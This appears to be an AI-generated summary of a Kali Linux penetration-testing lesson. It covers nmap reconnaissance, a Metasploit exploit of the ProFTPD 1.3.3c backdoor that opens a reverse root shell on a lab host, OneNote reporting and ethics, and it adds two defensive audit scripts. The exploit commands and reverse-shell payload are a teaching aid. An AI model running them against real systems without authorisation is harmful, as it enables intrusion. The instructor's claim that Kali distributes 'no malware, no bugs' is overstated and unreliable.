Summary

Overview

This session is a hands-on cybersecurity course focused on penetration testing using Kali Linux, covering network scanning, exploitation with Metasploit, enumeration, and documentation in OneNote. The instructor, Dr. Wesley Phillips, guides students through real-world attack workflows—such as identifying targets, scanning ports, exploiting vulnerabilities, and gaining root access—while emphasizing the importance of thorough documentation, ethical boundaries, and understanding the "why" behind each command. The course integrates practical tool usage, terminal navigation, and professional report-building, with frequent emphasis on portfolio development and real-world context over rote memorization.

Topic (Timeline)

1. Screen Sharing and Environment Setup [00:00:00 - 00:02:58]

The instructor troubleshoots screen-sharing issues during a live demo, ensuring students can follow along with Kali Linux and OneNote side-by-side.

  • The instructor repeatedly asks students to minimize competing windows (Zoom, desktop) to focus on the Kali terminal and OneNote.
  • Students are instructed to reconnect shared screens after timeouts and re-establish screen-sharing permissions.
  • Emphasis is placed on visual alignment: students must see both the terminal and OneNote simultaneously to follow steps accurately.
  • The instructor uses “split screen” as a core teaching method, requiring students to manage multiple open applications.

2. Exploitation Workflow: ProFTPD Exploit via Metasploit [00:05:26 - 00:12:09]

The instructor walks through a full exploitation chain targeting a vulnerable ProFTPD service on a test machine.

  • Students are instructed to launch msfconsole, search for proftpd 1.3.3c, and select the exploit with use 0.
  • Remote host (RHOSTS) is set to 10.0.3.16, and local host (LHOST) is configured to the Kali machine’s IP (10.0.3.15).
  • Payload cmd/unix/reverse is selected and executed, resulting in a shell.
  • Post-exploitation steps include running whoami (confirming root access) and navigating to /root.
  • The instructor stresses the need to verify each step visually and document outcomes in OneNote.

3. Screen Clipping and Documentation in OneNote [00:12:09 - 00:20:36]

The instructor teaches precise screen capture and cleanup techniques in OneNote to build a professional pen test report.

  • Students are guided to use OneNote’s “Screen Clipping” tool to capture terminal output without cropping.
  • Emphasis is placed on selecting the exact region—from top-left to bottom-right—without including extraneous UI elements.
  • Students are instructed to delete placeholder text (“Screen clipping taken on...”) using triple-click and delete.
  • Images are resized and aligned manually using corner handles, with strict rules on spacing and formatting.
  • The instructor insists on clean, minimal documentation: “I want you to look good.”

4. Network Discovery and Command Verification [00:20:42 - 00:25:55]

The instructor demonstrates how to capture and document network reconnaissance commands and outputs.

  • Students are required to capture the output of fping and nmap scans, ensuring full command-line context is visible.
  • The instructor insists on capturing the entire command line, not just the result, to prove execution.
  • Students are taught to use Ctrl+Shift++ to zoom terminal output for better clipping accuracy.
  • Multiple screen clippings are pasted sequentially in OneNote with deliberate spacing between them.
  • The instructor corrects over-capturing: “You copied that one twice. You only need one.”

5. Terminal Navigation and Process Management [02:38:25 - 02:45:32]

The instructor covers Linux system navigation, hidden files, process monitoring, and privilege escalation.

  • Hidden files are created with touch .dana.txt and revealed using ls -la.
  • The execute permission is added with chmod +x and removed with chmod -x to demonstrate exploitability.
  • Students learn to identify and kill processes using ps aux | grep apache2 and kill [PID] or kill -9.
  • Real-time monitoring tools (htop, atop) are introduced and installed via sudo apt install htop.
  • The instructor warns against leaving executable hidden files on systems—pen testers exploit them.
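
The warning about executable hidden files can be turned into a check a system owner runs on their own hosts. The script below is an added example, not code shown in the session; the function names and the sandbox files (other than .dana.txt) are constructed for the demonstration.

```sh
#!/bin/sh
# Added example: audit a directory tree for hidden files that carry an
# execute bit, then clear the bit with the lecture's chmod -x.

# List regular dot-files under DIR with any execute bit (user, group or other).
# -xdev keeps the walk on one filesystem; -perm -NNN is the POSIX form.
find_hidden_exec() {
    find "${1:-.}" -xdev -type f -name '.*' \
        \( -perm -100 -o -perm -010 -o -perm -001 \) -print 2>/dev/null | sort
}

# Remediate: remove execute permission from every finding.
# File names containing newlines are not handled by this simple loop.
strip_hidden_exec() {
    find_hidden_exec "$1" | while IFS= read -r f; do
        chmod a-x -- "$f"
    done
}

# Constructed sandbox: one hidden executable, one hidden plain file, and
# one visible script that must not be reported or modified.
make_sandbox() {
    d=$(mktemp -d) || return 1
    touch "$d/.dana.txt" "$d/.notes" "$d/visible.sh"
    chmod +x "$d/.dana.txt" "$d/visible.sh"
    printf '%s\n' "$d"
}

box=$(make_sandbox)
echo "before: $(find_hidden_exec "$box")"
strip_hidden_exec "$box"
echo "after:  $(find_hidden_exec "$box")"
rm -rf "$box"
```

Only dot-files themselves are matched; ordinary file names inside a hidden directory would need an additional -path test.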

6. Pen Test Methodology and Professional Workflow [02:52:53 - 03:00:56]

The instructor outlines the foundational steps of a professional penetration test and ethical boundaries.

  • A pen test begins with booting Kali, identifying the target, obtaining written permission, and defining scope.
  • First command: ip a to check local IP; then sudo netdiscover to find targets on the network.
  • MAC address matching is used to confirm target identity.
  • Connectivity is verified with ping or fping, stopped with Ctrl+C.
  • The instructor stresses: “You don’t just run commands; you need to understand why you’re doing them.”

7. Advanced Scanning and Exploitation [02:00:39 - 02:28:38]

The instructor demonstrates comprehensive network scanning and exploitation techniques.

  • Basic scan: nmap 10.0.3.16 identifies open ports (21, 22, 80).
  • Aggressive scan: nmap -A 10.0.3.16 enables OS detection, version detection, and script scanning.
  • Full port scan: nmap -A -p- 10.0.3.16 scans all 65,535 ports; output is saved to nmap-scan.txt.
  • Exploit search: searchsploit proftpd 1.3.3c finds a known backdoor.
  • Metasploit is used to exploit the service, gain root shell, and navigate to /root.
  • SSH access to external targets (e.g., bandit0@bandit.labs.overthewire.org) is introduced as a foundational skill.
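
The saved nmap-scan.txt is also useful to the asset owner: it can be reduced to an inventory of open services and checked against a list of versions that must not be running, such as the ProFTPD 1.3.3c build found above. The script below is an added example, not code from the session; the function names are hypothetical and the scan text is constructed (only the address, the three open ports and the ProFTPD version come from the summary).

```sh
#!/bin/sh
# Added example: triage nmap normal output (as saved with "> nmap-scan.txt").

# Print "host<TAB>port/proto<TAB>service<TAB>version" for every open port.
# Reads FILE, or standard input when no file is given.
open_services() {
    awk '
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host); next }
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            ver = ""
            for (i = 4; i <= NF; i++) ver = ver (i > 4 ? " " : "") $i
            print host "\t" $1 "\t" $3 "\t" (ver == "" ? "-" : ver)
        }
    ' "${1:--}"
}

# Print only the services whose line contains the watch-listed string
# (fixed string, case-insensitive). Exit status is non-zero when nothing matches.
flag_versions() {
    open_services "${2:--}" | grep -iF -- "$1"
}

# Constructed sample in nmap's normal output layout; banners other than
# ProFTPD 1.3.3c are placeholders.
sample_scan() {
    cat <<'EOF'
Nmap scan report for 10.0.3.16
Host is up (0.00050s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
21/tcp   open     ftp        ProFTPD 1.3.3c
22/tcp   open     ssh        OpenSSH (constructed banner)
80/tcp   open     http       Apache httpd (constructed banner)
8080/tcp filtered http-proxy
EOF
}

sample_scan | flag_versions 'ProFTPD 1.3.3c'
```

Against a real file the call is flag_versions 'ProFTPD 1.3.3c' nmap-scan.txt, and the non-zero exit status on no match makes it usable as a gate in a scheduled job.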

8. Tool Proficiency and Learning Strategy [01:44:13 - 01:47:50]

The instructor emphasizes self-directed learning, tool mastery, and real-world context.

  • Students are directed to Kali’s “Dragon” menu to explore categories: reconnaissance, privilege escalation, forensics, etc.
  • Learning must be done by building walkthroughs on vulnerable machines—not just watching.
  • ChatGPT is recommended as a learning aid: “Show me real examples to manage and kill Linux processes.”
  • Tools like rig (for generating fake identities) and btop (for resource monitoring) are introduced as research-level knowledge.
  • The instructor states: “Kali only pushes vetted software through the Linux Foundation—no malware, no bugs.”

9. Professional Context and Ethical Framework [01:47:50 - 01:50:23]

The instructor shifts focus from technical steps to professional practice and governance.

  • Pen testers must understand rules of engagement, timelines, budget, and stress factors—not just commands.
  • Students are instructed to bold “objective” and “written permission” in OneNote as non-negotiable prerequisites.
  • The instructor refuses to give step-by-step incident response guides: “I expect you to think your way through.”
  • Documentation is framed as a legal and professional requirement, not an administrative task.

10. Instructor Background and Teaching Philosophy [03:03:50 - 03:23:53]

The instructor shares his professional background to contextualize the course’s rigor and real-world relevance.

  • Served in U.S. Marine Corps communications, NSA technical surveillance, and law enforcement.
  • Led cybersecurity teams of 200+; managed insider threat programs at DISA; remediated SolarWinds breach.
  • Developed and deployed enterprise security tools (Splunk SOAR) through bureaucratic resistance.
  • Trained SOC analysts in GRC; achieved ATO for four systems in high-risk environments.
  • Believes in co-creation, documentation, and proving value to leadership—not just technical skill.
  • Rejects resume inflation: “Don’t put course badges on your resume as certifications.”

Appendix

Key Concepts

  • Penetration testing requires written permission and defined scope before any activity.
  • Documentation in OneNote is a professional deliverable, not an afterthought.
  • Understanding the purpose of each command is more important than memorizing syntax.
  • Hidden files (starting with .) are critical in both defense and offense.
  • Network reconnaissance must include MAC address matching to confirm target identity.
  • Exploitation workflows follow: scan → identify → exploit → gain access → document.
  • Kali Linux tools are vetted and safe; no malware is distributed through official channels.

Tools & Commands

  • ip a – View local network interfaces
  • sudo netdiscover – Discover live hosts on network
  • ping / fping – Test connectivity
  • nmap 10.0.3.16 – Scan top 1000 ports
  • nmap -A 10.0.3.16 – Aggressive scan (OS, version, scripts)
  • nmap -A -p- 10.0.3.16 > nmap-scan.txt – Full port scan with output save
  • searchsploit proftpd 1.3.3c – Find known exploits
  • msfconsole – Launch Metasploit Framework
  • use 0 – Select exploit
  • set RHOSTS 10.0.3.16 – Set target IP
  • set LHOST 10.0.3.15 – Set attacker IP
  • set payload cmd/unix/reverse – Choose reverse shell payload
  • exploit – Execute exploit
  • whoami – Confirm user privileges
  • cd /root – Navigate to root directory
  • ls -la – List all files including hidden
  • touch .filename – Create hidden file
  • chmod +x .filename – Make file executable
  • ps aux | grep apache2 – Find running process
  • kill [PID] – Terminate process
  • htop / btop – Real-time system monitoring
  • man rig – View documentation for identity generation tool
  • head -10 /etc/passwd – View first 10 users
  • tail / wc -l – View end of file / count lines
  • history – View command history
  • ssh username@host -p port – Remote access via SSH